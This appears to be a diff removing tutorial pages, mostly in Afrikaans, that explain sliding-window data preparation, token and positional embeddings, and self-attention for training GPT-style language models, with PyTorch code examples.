<table><thead><tr><th width="177">Window Position</th><th>Input Sequence</th><th>Target Sequence</th></tr></thead><tbody><tr><td>1</td><td>["Lorem", "ipsum", "dolor", "sit"]</td><td>["ipsum", "dolor", "sit", "amet,"]</td></tr><tr><td>2</td><td>["ipsum", "dolor", "sit", "amet,"]</td><td>["dolor", "sit", "amet,", "consectetur"]</td></tr><tr><td>3</td><td>["dolor", "sit", "amet,", "consectetur"]</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td></tr><tr><td>4</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td><td>["amet,", "consectetur", "adipiscing", "elit."]</td></tr></tbody></table>
|
|
||||||
|
|
||||||
3. **Resulting Input and Target Arrays:**
|
|
||||||
|
|
||||||
- **Input:**
|
|
||||||
|
|
||||||
```python
|
|
||||||
[
|
|
||||||
["Lorem", "ipsum", "dolor", "sit"],
|
|
||||||
["ipsum", "dolor", "sit", "amet,"],
|
|
||||||
["dolor", "sit", "amet,", "consectetur"],
|
|
||||||
["sit", "amet,", "consectetur", "adipiscing"],
|
|
||||||
]
|
|
||||||
```
|
|
||||||
|
|
||||||
- **Target:**
|
|
||||||
|
|
||||||
```python
|
|
||||||
[
|
|
||||||
["ipsum", "dolor", "sit", "amet,"],
|
|
||||||
["dolor", "sit", "amet,", "consectetur"],
|
|
||||||
["sit", "amet,", "consectetur", "adipiscing"],
|
|
||||||
["amet,", "consectetur", "adipiscing", "elit."],
|
|
||||||
]
|
|
||||||
```
|
|
||||||
|
|
||||||
**Visual Representation**
|
|
||||||
|
|
||||||
<table><thead><tr><th width="222">Token Position</th><th>Token</th></tr></thead><tbody><tr><td>1</td><td>Lorem</td></tr><tr><td>2</td><td>ipsum</td></tr><tr><td>3</td><td>dolor</td></tr><tr><td>4</td><td>sit</td></tr><tr><td>5</td><td>amet,</td></tr><tr><td>6</td><td>consectetur</td></tr><tr><td>7</td><td>adipiscing</td></tr><tr><td>8</td><td>elit.</td></tr></tbody></table>
|
|
||||||
|
|
||||||
**Sliding Window with Stride 1:**
|
|
||||||
|
|
||||||
- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
|
|
||||||
- **Second Window (Positions 2-5):** \["ipsum", "dolor", "sit", "amet,"] → **Target:** \["dolor", "sit", "amet,", "consectetur"]
|
|
||||||
- **Third Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
|
|
||||||
- **Fourth Window (Positions 4-7):** \["sit", "amet,", "consectetur", "adipiscing"] → **Target:** \["amet,", "consectetur", "adipiscing", "elit."]
|
|
||||||
|
|
||||||
**Understanding Stride**
|
|
||||||
|
|
||||||
- **Stride of 1:** The window moves forward by one token each time, resulting in highly overlapping sequences. This can lead to better learning of contextual relationships but may increase the risk of overfitting since similar data points are repeated.
|
|
||||||
- **Stride of 2:** The window moves forward by two tokens each time, reducing overlap. This decreases redundancy and computational load but might miss some contextual nuances.
|
|
||||||
- **Stride Equal to max_length:** The window moves forward by the entire window size, resulting in non-overlapping sequences. This minimizes data redundancy but may limit the model's ability to learn dependencies across sequences.
|
|
||||||
|
|
||||||
**Example with Stride of 2:**
|
|
||||||
|
|
||||||
Using the same tokenized text and `max_length` of 4:
|
|
||||||
|
|
||||||
- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
|
|
||||||
- **Second Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
|
|
||||||
- **Third Window (Positions 5-8):** \["amet,", "consectetur", "adipiscing", "elit."] → **Target:** \["consectetur", "adipiscing", "elit.", "sed"] _(Assuming continuation)_
|
|
||||||
|
|
||||||
## Code Example
|
|
||||||
|
|
||||||
Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Download the text to pre-train the LLM
|
|
||||||
import urllib.request
|
|
||||||
url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
|
|
||||||
file_path = "the-verdict.txt"
|
|
||||||
urllib.request.urlretrieve(url, file_path)
|
|
||||||
|
|
||||||
with open("the-verdict.txt", "r", encoding="utf-8") as f:
|
|
||||||
raw_text = f.read()
|
|
||||||
|
|
||||||
"""
|
|
||||||
Create a class that will receive some params lie tokenizer and text
|
|
||||||
and will prepare the input chunks and the target chunks to prepare
|
|
||||||
the LLM to learn which next token to generate
|
|
||||||
"""
|
|
||||||
import torch
|
|
||||||
from torch.utils.data import Dataset, DataLoader
|
|
||||||
|
|
||||||
class GPTDatasetV1(Dataset):
|
|
||||||
def __init__(self, txt, tokenizer, max_length, stride):
|
|
||||||
self.input_ids = []
|
|
||||||
self.target_ids = []
|
|
||||||
|
|
||||||
# Tokenize the entire text
|
|
||||||
token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})
|
|
||||||
|
|
||||||
# Use a sliding window to chunk the book into overlapping sequences of max_length
|
|
||||||
for i in range(0, len(token_ids) - max_length, stride):
|
|
||||||
input_chunk = token_ids[i:i + max_length]
|
|
||||||
target_chunk = token_ids[i + 1: i + max_length + 1]
|
|
||||||
self.input_ids.append(torch.tensor(input_chunk))
|
|
||||||
self.target_ids.append(torch.tensor(target_chunk))
|
|
||||||
|
|
||||||
def __len__(self):
|
|
||||||
return len(self.input_ids)
|
|
||||||
|
|
||||||
def __getitem__(self, idx):
|
|
||||||
return self.input_ids[idx], self.target_ids[idx]
|
|
||||||
|
|
||||||
|
|
||||||
"""
|
|
||||||
Create a data loader which given the text and some params will
|
|
||||||
prepare the inputs and targets with the previous class and
|
|
||||||
then create a torch DataLoader with the info
|
|
||||||
"""
|
|
||||||
|
|
||||||
import tiktoken
|
|
||||||
|
|
||||||
def create_dataloader_v1(txt, batch_size=4, max_length=256,
|
|
||||||
stride=128, shuffle=True, drop_last=True,
|
|
||||||
num_workers=0):
|
|
||||||
|
|
||||||
# Initialize the tokenizer
|
|
||||||
tokenizer = tiktoken.get_encoding("gpt2")
|
|
||||||
|
|
||||||
# Create dataset
|
|
||||||
dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)
|
|
||||||
|
|
||||||
# Create dataloader
|
|
||||||
dataloader = DataLoader(
|
|
||||||
dataset,
|
|
||||||
batch_size=batch_size,
|
|
||||||
shuffle=shuffle,
|
|
||||||
drop_last=drop_last,
|
|
||||||
num_workers=num_workers
|
|
||||||
)
|
|
||||||
|
|
||||||
return dataloader
|
|
||||||
|
|
||||||
|
|
||||||
"""
|
|
||||||
Finally, create the data loader with the params we want:
|
|
||||||
- The used text for training
|
|
||||||
- batch_size: The size of each batch
|
|
||||||
- max_length: The size of each entry on each batch
|
|
||||||
- stride: The sliding window (how many tokens should the next entry advance compared to the previous one). The smaller the more overfitting, usually this is equals to the max_length so the same tokens aren't repeated.
|
|
||||||
- shuffle: Re-order randomly
|
|
||||||
"""
|
|
||||||
dataloader = create_dataloader_v1(
|
|
||||||
raw_text, batch_size=8, max_length=4, stride=1, shuffle=False
|
|
||||||
)
|
|
||||||
|
|
||||||
data_iter = iter(dataloader)
|
|
||||||
first_batch = next(data_iter)
|
|
||||||
print(first_batch)
|
|
||||||
|
|
||||||
# Note the batch_size of 8, the max_length of 4 and the stride of 1
|
|
||||||
[
|
|
||||||
# Input
|
|
||||||
tensor([[ 40, 367, 2885, 1464],
|
|
||||||
[ 367, 2885, 1464, 1807],
|
|
||||||
[ 2885, 1464, 1807, 3619],
|
|
||||||
[ 1464, 1807, 3619, 402],
|
|
||||||
[ 1807, 3619, 402, 271],
|
|
||||||
[ 3619, 402, 271, 10899],
|
|
||||||
[ 402, 271, 10899, 2138],
|
|
||||||
[ 271, 10899, 2138, 257]]),
|
|
||||||
# Target
|
|
||||||
tensor([[ 367, 2885, 1464, 1807],
|
|
||||||
[ 2885, 1464, 1807, 3619],
|
|
||||||
[ 1464, 1807, 3619, 402],
|
|
||||||
[ 1807, 3619, 402, 271],
|
|
||||||
[ 3619, 402, 271, 10899],
|
|
||||||
[ 402, 271, 10899, 2138],
|
|
||||||
[ 271, 10899, 2138, 257],
|
|
||||||
[10899, 2138, 257, 7026]])
|
|
||||||
]
|
|
||||||
|
|
||||||
# With stride=4 this will be the result:
|
|
||||||
[
|
|
||||||
# Input
|
|
||||||
tensor([[ 40, 367, 2885, 1464],
|
|
||||||
[ 1807, 3619, 402, 271],
|
|
||||||
[10899, 2138, 257, 7026],
|
|
||||||
[15632, 438, 2016, 257],
|
|
||||||
[ 922, 5891, 1576, 438],
|
|
||||||
[ 568, 340, 373, 645],
|
|
||||||
[ 1049, 5975, 284, 502],
|
|
||||||
[ 284, 3285, 326, 11]]),
|
|
||||||
# Target
|
|
||||||
tensor([[ 367, 2885, 1464, 1807],
|
|
||||||
[ 3619, 402, 271, 10899],
|
|
||||||
[ 2138, 257, 7026, 15632],
|
|
||||||
[ 438, 2016, 257, 922],
|
|
||||||
[ 5891, 1576, 438, 568],
|
|
||||||
[ 340, 373, 645, 1049],
|
|
||||||
[ 5975, 284, 502, 284],
|
|
||||||
[ 3285, 326, 11, 287]])
|
|
||||||
]
|
|
||||||
```
|
|
||||||
|
|
||||||
## References
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
||||||
|
|
@ -1,203 +0,0 @@
|
|||||||
# 3. Token Embeddings
|
|
||||||
|
|
||||||
## Token Embeddings
|
|
||||||
|
|
||||||
Na die tokenisering van teksdata, is die volgende kritieke stap in die voorbereiding van data vir die opleiding van groot taalmodelle (LLMs) soos GPT die skep van **token embeddings**. Token embeddings transformeer diskrete tokens (soos woorde of subwoorde) in deurlopende numeriese vektore wat die model kan verwerk en daaruit kan leer. Hierdie verduideliking breek token embeddings, hul inisialisering, gebruik, en die rol van posisionele embeddings in die verbetering van die model se begrip van tokenreekse af.
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie derde fase is baie eenvoudig: **Ken elkeen van die vorige tokens in die woordeskat 'n vektor van die verlangde dimensies toe om die model op te lei.** Elke woord in die woordeskat sal 'n punt in 'n ruimte van X dimensies wees.\
|
|
||||||
> Let daarop dat die posisie van elke woord in die ruimte aanvanklik net "random" geinisialiseer word en hierdie posisies is opleibare parameters (sal verbeter word tydens die opleiding).
|
|
||||||
>
|
|
||||||
> Boonop, tydens die token embedding **word 'n ander laag van embeddings geskep** wat (in hierdie geval) die **absolute posisie van die woord in die opleidingssin** verteenwoordig. Op hierdie manier sal 'n woord in verskillende posisies in die sin 'n ander voorstelling (betekenis) hê.
|
|
||||||
|
|
||||||
### **What Are Token Embeddings?**
|
|
||||||
|
|
||||||
**Token Embeddings** is numeriese verteenwoordigings van tokens in 'n deurlopende vektorruimte. Elke token in die woordeskat is geassosieer met 'n unieke vektor van vaste dimensies. Hierdie vektore vang semantiese en sintaktiese inligting oor die tokens vas, wat die model in staat stel om verhoudings en patrone in die data te verstaan.
|
|
||||||
|
|
||||||
- **Vocabulary Size:** Die totale aantal unieke tokens (bv. woorde, subwoorde) in die model se woordeskat.
|
|
||||||
- **Embedding Dimensions:** Die aantal numeriese waardes (dimensies) in elke token se vektor. Hoër dimensies kan meer genuanseerde inligting vasvang, maar vereis meer rekenaarhulpbronne.
|
|
||||||
|
|
||||||
**Example:**
|
|
||||||
|
|
||||||
- **Vocabulary Size:** 6 tokens \[1, 2, 3, 4, 5, 6]
|
|
||||||
- **Embedding Dimensions:** 3 (x, y, z)
|
|
||||||
|
|
||||||
### **Initializing Token Embeddings**
|
|
||||||
|
|
||||||
Aan die begin van die opleiding, word token embeddings tipies met klein random waardes geinisialiseer. Hierdie aanvanklike waardes word aangepas (fyngestem) tydens opleiding om die tokens se betekenisse beter te verteenwoordig op grond van die opleidingsdata.
|
|
||||||
|
|
||||||
**PyTorch Example:**
|
|
||||||
```python
|
|
||||||
import torch
|
|
||||||
|
|
||||||
# Set a random seed for reproducibility
|
|
||||||
torch.manual_seed(123)
|
|
||||||
|
|
||||||
# Create an embedding layer with 6 tokens and 3 dimensions
|
|
||||||
embedding_layer = torch.nn.Embedding(6, 3)
|
|
||||||
|
|
||||||
# Display the initial weights (embeddings)
|
|
||||||
print(embedding_layer.weight)
|
|
||||||
```
|
|
||||||
**Uitset:**
|
|
||||||
```lua
|
|
||||||
luaCopy codeParameter containing:
|
|
||||||
tensor([[ 0.3374, -0.1778, -0.1690],
|
|
||||||
[ 0.9178, 1.5810, 1.3010],
|
|
||||||
[ 1.2753, -0.2010, -0.1606],
|
|
||||||
[-0.4015, 0.9666, -1.1481],
|
|
||||||
[-1.1589, 0.3255, -0.6315],
|
|
||||||
[-2.8400, -0.7849, -1.4096]], requires_grad=True)
|
|
||||||
```
|
|
||||||
**Verklaring:**
|
|
||||||
|
|
||||||
- Elke ry kom ooreen met 'n token in die woordeskat.
|
|
||||||
- Elke kolom verteenwoordig 'n dimensie in die inbedingsvektor.
|
|
||||||
- Byvoorbeeld, die token op indeks `3` het 'n inbedingsvektor `[-0.4015, 0.9666, -1.1481]`.
|
|
||||||
|
|
||||||
**Toegang tot 'n Token se Inbeding:**
|
|
||||||
```python
|
|
||||||
# Retrieve the embedding for the token at index 3
|
|
||||||
token_index = torch.tensor([3])
|
|
||||||
print(embedding_layer(token_index))
|
|
||||||
```
|
|
||||||
**Uitset:**
|
|
||||||
```lua
|
|
||||||
tensor([[-0.4015, 0.9666, -1.1481]], grad_fn=<EmbeddingBackward0>)
|
|
||||||
```
|
|
||||||
**Interpretasie:**
|
|
||||||
|
|
||||||
- Die token by indeks `3` word verteenwoordig deur die vektor `[-0.4015, 0.9666, -1.1481]`.
|
|
||||||
- Hierdie waardes is opleidingsparameters wat die model tydens opleiding sal aanpas om die token se konteks en betekenis beter te verteenwoordig.
|
|
||||||
|
|
||||||
### **Hoe Token Embeddings Werk Tydens Opleiding**
|
|
||||||
|
|
||||||
Tydens opleiding word elke token in die invoerdata omgeskakel na sy ooreenstemmende embedding vektor. Hierdie vektore word dan in verskeie berekeninge binne die model gebruik, soos aandagmeganismes en neurale netwerklae.
|
|
||||||
|
|
||||||
**Voorbeeld Scenario:**
|
|
||||||
|
|
||||||
- **Batch Grootte:** 8 (aantal monsters wat gelyktydig verwerk word)
|
|
||||||
- **Max Volgorde Lengte:** 4 (aantal tokens per monster)
|
|
||||||
- **Embedding Dimensies:** 256
|
|
||||||
|
|
||||||
**Data Struktuur:**
|
|
||||||
|
|
||||||
- Elke batch word verteenwoordig as 'n 3D tensor met die vorm `(batch_size, max_length, embedding_dim)`.
|
|
||||||
- Vir ons voorbeeld sou die vorm wees `(8, 4, 256)`.
|
|
||||||
|
|
||||||
**Visualisering:**
|
|
||||||
```css
|
|
||||||
cssCopy codeBatch
|
|
||||||
┌─────────────┐
|
|
||||||
│ Sample 1 │
|
|
||||||
│ ┌─────┐ │
|
|
||||||
│ │Token│ → [x₁₁, x₁₂, ..., x₁₂₅₆]
|
|
||||||
│ │ 1 │ │
|
|
||||||
│ │... │ │
|
|
||||||
│ │Token│ │
|
|
||||||
│ │ 4 │ │
|
|
||||||
│ └─────┘ │
|
|
||||||
│ Sample 2 │
|
|
||||||
│ ┌─────┐ │
|
|
||||||
│ │Token│ → [x₂₁, x₂₂, ..., x₂₂₅₆]
|
|
||||||
│ │ 1 │ │
|
|
||||||
│ │... │ │
|
|
||||||
│ │Token│ │
|
|
||||||
│ │ 4 │ │
|
|
||||||
│ └─────┘ │
|
|
||||||
│ ... │
|
|
||||||
│ Sample 8 │
|
|
||||||
│ ┌─────┐ │
|
|
||||||
│ │Token│ → [x₈₁, x₈₂, ..., x₈₂₅₆]
|
|
||||||
│ │ 1 │ │
|
|
||||||
│ │... │ │
|
|
||||||
│ │Token│ │
|
|
||||||
│ │ 4 │ │
|
|
||||||
│ └─────┘ │
|
|
||||||
└─────────────┘
|
|
||||||
```
|
|
||||||
**Verklaring:**
|
|
||||||
|
|
||||||
- Elke token in die reeks word verteenwoordig deur 'n 256-dimensionele vektor.
|
|
||||||
- Die model verwerk hierdie embeddings om taalpatrone te leer en voorspellings te genereer.
|
|
||||||
|
|
||||||
## **Posisionele Embeddings: Voeg Konteks by Token Embeddings**
|
|
||||||
|
|
||||||
Terwyl token embeddings die betekenis van individuele tokens vasvang, kodeer hulle nie inherent die posisie van tokens binne 'n reeks nie. Om die volgorde van tokens te verstaan, is noodsaaklik vir taalbegrip. Dit is waar **posisionele embeddings** in die prentjie kom.
|
|
||||||
|
|
||||||
### **Waarom Posisionele Embeddings Benodig Word:**
|
|
||||||
|
|
||||||
- **Token Volgorde Maak Saak:** In sinne hang die betekenis dikwels af van die volgorde van woorde. Byvoorbeeld, "Die kat het op die mat gesit" teenoor "Die mat het op die kat gesit."
|
|
||||||
- **Embedding Beperking:** Sonder posisionele inligting behandel die model tokens as 'n "sak van woorde," terwyl hulle hul volgorde ignoreer.
|
|
||||||
|
|
||||||
### **Tipes van Posisionele Embeddings:**
|
|
||||||
|
|
||||||
1. **Absoluut Posisionele Embeddings:**
|
|
||||||
- Ken 'n unieke posisie vektor aan elke posisie in die reeks toe.
|
|
||||||
- **Voorbeeld:** Die eerste token in enige reeks het dieselfde posisionele embedding, die tweede token het 'n ander, en so aan.
|
|
||||||
- **Gebruik Deur:** OpenAI se GPT-modelle.
|
|
||||||
2. **Relatiewe Posisionele Embeddings:**
|
|
||||||
- Kodeer die relatiewe afstand tussen tokens eerder as hul absolute posisies.
|
|
||||||
- **Voorbeeld:** Dui aan hoe ver twee tokens van mekaar af is, ongeag hul absolute posisies in die reeks.
|
|
||||||
- **Gebruik Deur:** Modelle soos Transformer-XL en sommige variasies van BERT.
|
|
||||||
|
|
||||||
### **Hoe Posisionele Embeddings Geïntegreer Word:**
|
|
||||||
|
|
||||||
- **Dieselfde Dimensies:** Posisionele embeddings het dieselfde dimensionaliteit as token embeddings.
|
|
||||||
- **Byvoeging:** Hulle word by token embeddings gevoeg, wat token identiteit kombineer met posisionele inligting sonder om die algehele dimensionaliteit te verhoog.
|
|
||||||
|
|
||||||
**Voorbeeld van Byvoeging van Posisionele Embeddings:**
|
|
||||||
|
|
||||||
Neem aan 'n token embedding vektor is `[0.5, -0.2, 0.1]` en sy posisionele embedding vektor is `[0.1, 0.3, -0.1]`. Die gekombineerde embedding wat deur die model gebruik word, sou wees:
|
|
||||||
```css
|
|
||||||
Combined Embedding = Token Embedding + Positional Embedding
|
|
||||||
= [0.5 + 0.1, -0.2 + 0.3, 0.1 + (-0.1)]
|
|
||||||
= [0.6, 0.1, 0.0]
|
|
||||||
```
|
|
||||||
**Voordele van Posisionele Embeddings:**
|
|
||||||
|
|
||||||
- **Kontextuele Bewustheid:** Die model kan tussen tokens onderskei op grond van hul posisies.
|
|
||||||
- **Volgorde Begrip:** Stel die model in staat om grammatika, sintaksis en kontekstafhanklike betekenisse te verstaan.
|
|
||||||
|
|
||||||
## Kode Voorbeeld
|
|
||||||
|
|
||||||
Volg met die kode voorbeeld van [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
|
|
||||||
```python
|
|
||||||
# Use previous code...
|
|
||||||
|
|
||||||
# Create dimensional emdeddings
|
|
||||||
"""
|
|
||||||
BPE uses a vocabulary of 50257 words
|
|
||||||
Let's supose we want to use 256 dimensions (instead of the millions used by LLMs)
|
|
||||||
"""
|
|
||||||
|
|
||||||
vocab_size = 50257
|
|
||||||
output_dim = 256
|
|
||||||
token_embedding_layer = torch.nn.Embedding(vocab_size, output_dim)
|
|
||||||
|
|
||||||
## Generate the dataloader like before
|
|
||||||
max_length = 4
|
|
||||||
dataloader = create_dataloader_v1(
|
|
||||||
raw_text, batch_size=8, max_length=max_length,
|
|
||||||
stride=max_length, shuffle=False
|
|
||||||
)
|
|
||||||
data_iter = iter(dataloader)
|
|
||||||
inputs, targets = next(data_iter)
|
|
||||||
|
|
||||||
# Apply embeddings
|
|
||||||
token_embeddings = token_embedding_layer(inputs)
|
|
||||||
print(token_embeddings.shape)
|
|
||||||
torch.Size([8, 4, 256]) # 8 x 4 x 256
|
|
||||||
|
|
||||||
# Generate absolute embeddings
|
|
||||||
context_length = max_length
|
|
||||||
pos_embedding_layer = torch.nn.Embedding(context_length, output_dim)
|
|
||||||
|
|
||||||
pos_embeddings = pos_embedding_layer(torch.arange(max_length))
|
|
||||||
|
|
||||||
input_embeddings = token_embeddings + pos_embeddings
|
|
||||||
print(input_embeddings.shape) # torch.Size([8, 4, 256])
|
|
||||||
```
|
|
||||||
## Verwysings
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
@ -1,418 +0,0 @@
|
|||||||
# 4. Aandag Meganismes
|
|
||||||
|
|
||||||
## Aandag Meganismes en Self-Aandag in Neurale Netwerke
|
|
||||||
|
|
||||||
Aandag meganismes laat neurale netwerke toe om **op spesifieke dele van die invoer te fokus wanneer hulle elke deel van die uitvoer genereer**. Hulle ken verskillende gewigte aan verskillende invoere toe, wat die model help om te besluit watter invoere die mees relevant is vir die taak wat voorlê. Dit is van kardinale belang in take soos masjienvertaling, waar die begrip van die konteks van die hele sin noodsaaklik is vir akkurate vertaling.
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie vierde fase is baie eenvoudig: **Pas 'n paar aandag meganismes toe**. Hierdie gaan baie **herhaalde lae** wees wat die **verhouding van 'n woord in die woordeskat met sy bure in die huidige sin wat gebruik word om die LLM te train, vasvang**.\
|
|
||||||
> 'n Groot aantal lae word hiervoor gebruik, so 'n groot aantal leerbare parameters gaan hierdie inligting vasvang.
|
|
||||||
|
|
||||||
### Verstaan Aandag Meganismes
|
|
||||||
|
|
||||||
In tradisionele volgorde-tot-volgorde modelle wat vir taalvertaling gebruik word, kodeer die model 'n invoer volgorde in 'n vaste-grootte konteksvektor. Hierdie benadering sukkel egter met lang sinne omdat die vaste-grootte konteksvektor dalk nie al die nodige inligting vasvang nie. Aandag meganismes spreek hierdie beperking aan deur die model toe te laat om al die invoer tokens in ag te neem wanneer dit elke uitvoer token genereer.
|
|
||||||
|
|
||||||
#### Voorbeeld: Masjienvertaling
|
|
||||||
|
|
||||||
Oorweeg om die Duitse sin "Kannst du mir helfen diesen Satz zu übersetzen" in Engels te vertaal. 'n Woord-vir-woord vertaling sou nie 'n grammatikaal korrekte Engelse sin lewer nie weens verskille in grammatikaal strukture tussen tale. 'n Aandag meganisme stel die model in staat om op relevante dele van die invoer sin te fokus wanneer dit elke woord van die uitvoer sin genereer, wat lei tot 'n meer akkurate en samehangende vertaling.
|
|
||||||
|
|
||||||
### Inleiding tot Self-Aandag
|
|
||||||
|
|
||||||
Self-aandag, of intra-aandag, is 'n meganisme waar aandag binne 'n enkele volgorde toegepas word om 'n voorstelling van daardie volgorde te bereken. Dit laat elke token in die volgorde toe om op al die ander tokens te let, wat die model help om afhanklikhede tussen tokens vas te vang ongeag hul afstand in die volgorde.
|
|
||||||
|
|
||||||
#### Sleutelkonsepte
|
|
||||||
|
|
||||||
- **Tokens**: Individuele elemente van die invoer volgorde (bv. woorde in 'n sin).
|
|
||||||
- **Embeddings**: Vektor voorstellings van tokens, wat semantiese inligting vasvang.
|
|
||||||
- **Aandag Gewigte**: Waardes wat die belangrikheid van elke token relatief tot ander bepaal.
|
|
||||||
|
|
||||||
### Berekening van Aandag Gewigte: 'n Stap-vir-Stap Voorbeeld
|
|
||||||
|
|
||||||
Kom ons oorweeg die sin **"Hello shiny sun!"** en verteenwoordig elke woord met 'n 3-dimensionele embedding:
|
|
||||||
|
|
||||||
- **Hello**: `[0.34, 0.22, 0.54]`
|
|
||||||
- **shiny**: `[0.53, 0.34, 0.98]`
|
|
||||||
- **sun**: `[0.29, 0.54, 0.93]`
|
|
||||||
|
|
||||||
Ons doel is om die **konteksvektor** vir die woord **"shiny"** te bereken met behulp van self-aandag.
|
|
||||||
|
|
||||||
#### Stap 1: Bereken Aandag Punte
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Vermy om in die wiskundige terme te verlore te gaan, die doel van hierdie funksie is eenvoudig, normaliseer al die gewigte sodat **hulle in totaal 1 optel**.
|
|
||||||
>
|
|
||||||
> Boonop, **softmax** funksie word gebruik omdat dit verskille beklemtoon as gevolg van die eksponensiële deel, wat dit makliker maak om nuttige waardes te identifiseer.
|
|
||||||
|
|
||||||
Vir elke woord in die sin, bereken die **aandag punt** ten opsigte van "shiny" deur die dot produk van hul embeddings te bereken.
|
|
||||||
|
|
||||||
**Aandag Punt tussen "Hello" en "shiny"**
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (4) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**Aandag Punt tussen "shiny" en "shiny"**
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**Aandag Punt tussen "sun" en "shiny"**
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (2) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
#### Stap 2: Normaliseer Aandag Punte om Aandag Gewigte te Verkry
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Moet nie in die wiskundige terme verlore gaan nie, die doel van hierdie funksie is eenvoudig, normaliseer al die gewigte sodat **hulle in totaal 1 optel**.
|
|
||||||
>
|
|
||||||
> Boonop, **softmax** funksie word gebruik omdat dit verskille beklemtoon as gevolg van die eksponensiële deel, wat dit makliker maak om nuttige waardes te identifiseer.
|
|
||||||
|
|
||||||
Pas die **softmax funksie** toe op die aandag punte om hulle in aandag gewigte te omskep wat tot 1 optel.
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (3) (1) (1) (1) (1).png" alt="" width="293"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Berekening van die eksponensiale:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (4) (1) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Berekening van die som:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (5) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Berekening van aandag gewigte:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (6) (1) (1).png" alt="" width="404"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
#### Stap 3: Bereken die Konteksvektor
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Kry net elke aandag gewig en vermenigvuldig dit met die verwante token dimensies en som dan al die dimensies om net 1 vektor (die konteksvektor) te kry.
|
|
||||||
|
|
||||||
Die **konteksvektor** word bereken as die gewigte som van die embeddings van al die woorde, met behulp van die aandag gewigte.
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (16).png" alt="" width="369"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Berekening van elke komponent:
|
|
||||||
|
|
||||||
- **Gewigte Embedding van "Hello"**:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (7) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
- **Gewigte Embedding van "shiny"**:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (8) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
- **Gewigte Embedding van "sun"**:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (9) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Som die gewigte embeddings:
|
|
||||||
|
|
||||||
`konteksvektor=[0.0779+0.2156+0.1057, 0.0504+0.1382+0.1972, 0.1237+0.3983+0.3390]=[0.3992,0.3858,0.8610]`
|
|
||||||
|
|
||||||
**Hierdie konteksvektor verteenwoordig die verrykte embedding vir die woord "shiny," wat inligting van al die woorde in die sin inkorporeer.**
|
|
||||||
|
|
||||||
### Samevatting van die Proses
|
|
||||||
|
|
||||||
1. **Bereken Aandag Punte**: Gebruik die dot produk tussen die embedding van die teikenwoord en die embeddings van al die woorde in die volgorde.
|
|
||||||
2. **Normaliseer Punte om Aandag Gewigte te Verkry**: Pas die softmax funksie toe op die aandag punte om gewigte te verkry wat tot 1 optel.
|
|
||||||
3. **Bereken Konteksvektor**: Vermenigvuldig elke woord se embedding met sy aandag gewig en som die resultate.
|
|
||||||
|
|
||||||
## Self-Aandag met Leerbare Gewigte
|
|
||||||
|
|
||||||
In praktyk gebruik self-aandag meganismes **leerbare gewigte** om die beste voorstellings vir vrae, sleutels, en waardes te leer. Dit behels die bekendstelling van drie gewig matrikse:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (10) (1) (1).png" alt="" width="239"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Die vraag is die data om soos voorheen te gebruik, terwyl die sleutels en waardes matrikse bloot ewekansige-leerbare matrikse is.
|
|
||||||
|
|
||||||
#### Stap 1: Bereken Vrae, Sleutels, en Waardes
|
|
||||||
|
|
||||||
